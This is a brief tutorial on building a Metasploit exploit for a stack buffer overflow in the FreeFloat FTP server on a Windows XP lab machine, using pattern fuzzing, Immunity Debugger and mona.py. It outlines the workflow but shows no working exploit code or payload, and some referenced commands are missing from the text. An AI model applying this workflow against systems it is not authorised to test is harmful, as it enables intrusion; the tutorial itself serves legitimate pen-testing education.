Security

Writing an Exploit for Metasploit

Metasploit has a lot of built-in modules and plugins that allow for effective pen-testing. But it also serves as an incredibly customizable tool with which you can customize exploits specific to the system you are planning to attack.This walkthrough will cover stack-based buffer overflows and buffer overflow exploits, as well as how to write a simple Metasploit exploit by yourself.

Types of Exploits

Types of Exploits in Metasploit:

  • Active
  • Passive

The core difference between these two exploit types is that the active type exploits a specific target before it terminates, whereas the passive type waits until an incoming host connects before exploiting. It helps to know these beforehand, as the difference will play a clearer role when you graduate to writing more complicated exploits.

Our Setup

The software we will use in this tutorial include the following:

The exploit: For the purpose of this short guide, we will be using a pre-existing vulnerability in the freefloat FTP server.

Immunity debugger: This is used in creating exploits and reverse-engineering binary files. You can easily come by a good debugger available online for free.

Windows XP service pack 3 installed

Kali Linux: Obviously, the undisputed leading pen testing aid.

Mona.py: A Python-based plugin that helps with immunity debugging. Download Mona.py and move it to the immunity debugger directory (the py command folder).

The Process

Imitate Fuzzing

We will perform pseudo-fuzzing, which entails flooding the system with random data. We will craft a pattern with 1,000 characters and use it to overwhelm port 21, as it is the FTP server’s command port.

Once the module is executed, fire up the immunity debugger, and make sure that EIP has been overwritten.

Fire Up Mona

With the EIP overwritten, we can further proceed with the immunity debugger. Enter the following:

>!Mona suggest

Select the TCP client and port 21 to continue.

Customize Exploit

You will see a ruby-based file created as a result. You can modify it any way you want. Here, we will rename it to f.rb.

Launch the Exploit in Metasploit

Load the file into Kali Linux and replicate the exploit from the root to the Metasploit framework:

You can see that Metasploit acknowledges the changes and is compatible.

Conclusion

This was a mini-tutorial on how to write a Metasploit exploit. We will discuss more complicated exploits and see how they are written in future articles.

About the author

Younis Said

I am a freelancing software project developer, a software engineering graduate and a content writer. I love working with Linux and open-source software.